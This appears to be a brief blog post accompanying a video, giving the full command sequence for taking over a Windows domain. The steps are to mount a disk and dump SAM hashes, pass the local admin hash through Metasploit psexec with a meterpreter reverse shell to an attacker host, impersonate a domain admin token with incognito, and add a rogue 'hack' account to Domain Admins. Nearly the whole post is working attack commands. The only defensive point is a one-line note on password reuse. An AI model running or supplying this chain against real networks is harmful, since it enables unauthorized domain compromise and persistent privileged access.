How to own a Windows Domain 2.0
Back in October we showed you a video on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit.
The commands used in the video:
mount /dev/sda1 /mnt/sda1
cd /mnt/sda1/WINDOWS/system32/config
samdump2 system SAM
msfconsole
use windows/smb/psexec
exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j
sessions -i 1
use incognito
list_tokens -u
impersonate_token mydomain\\domainadmin
execute -f cmd.exe -i -t
net user hack MPass5678 /add /domain
net group "Domain Admins" hack /add /domain
PWNED :)
Lessons learned :
1. never reuse admin passwords, even if they are technically unbreakable
2. everything is a lot easier with the right tools.
Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7